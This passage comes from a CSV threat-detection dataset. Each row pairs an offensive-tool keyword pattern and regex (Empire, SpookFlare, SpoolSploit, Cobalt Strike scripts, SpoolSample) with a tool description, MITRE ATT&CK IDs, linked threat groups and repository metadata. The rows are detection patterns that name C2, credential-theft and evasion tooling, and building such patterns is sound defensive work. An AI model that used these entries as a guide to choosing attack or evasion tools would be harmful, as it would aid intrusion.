LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59987"
"*SpooferIPsIgnore*",".{0,1000}SpooferIPsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59988"
"*SpooferIPsReply*",".{0,1000}SpooferIPsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59989"
"*SpooferLearningDelay*",".{0,1000}SpooferLearningDelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59990"
"*SpooferLearningInterval*",".{0,1000}SpooferLearningInterval.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59991"
"*SpooferRepeat*",".{0,1000}SpooferRepeat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59992"
"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*",".{0,1000}SPOOFING\sGROUP\sPOLICY\sTEMPLATE\sLOCATION\sTHROUGH\sgPCFileSysPath.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","59993"
"*Spoofy/spoofy.py*",".{0,1000}Spoofy\/spoofy\.py.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","59994"
"*SpookFlare*",".{0,1000}SpookFlare.{0,1000}","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","N/A","10","950","188","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z","59995"
"*spookflare.py*",".{0,1000}spookflare\.py.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59996"
"*spool_sploit.py*",".{0,1000}spool_sploit\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","59997"
"*spooler_check*",".{0,1000}spooler_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59998"
"*SpoolSample.exe * *",".{0,1000}SpoolSample\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","59999"
"*SpoolSample_v4.5_x64.exe*",".{0,1000}SpoolSample_v4\.5_x64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60000"
"*SpoolSploit/*",".{0,1000}SpoolSploit\/.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","60001"
"*spoolsploit:latest*",".{0,1000}spoolsploit\:latest.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","60002"
"*spoolss_##*",".{0,1000}spoolss_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","60003"
"*spoolsystem inject*",".{0,1000}spoolsystem\sinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60004"
"*spoolsystem spawn*",".{0,1000}spoolsystem\sspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60005"
"*spoolsystem.cna*",".{0,1000}spoolsystem\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60006"
"*SpoolTrigger.x64.dl*",".{0,1000}SpoolTrigger\.x64\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60007"
"*SpoolTrigger.x64.dll*",".{0,1000}SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60008"
"*SpoolTrigger.x86.dl*",".{0,1000}SpoolTrigger\.x86\.dl.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","60009"
"*SpoolTrigger.x86.dll*",".{0,1000}SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 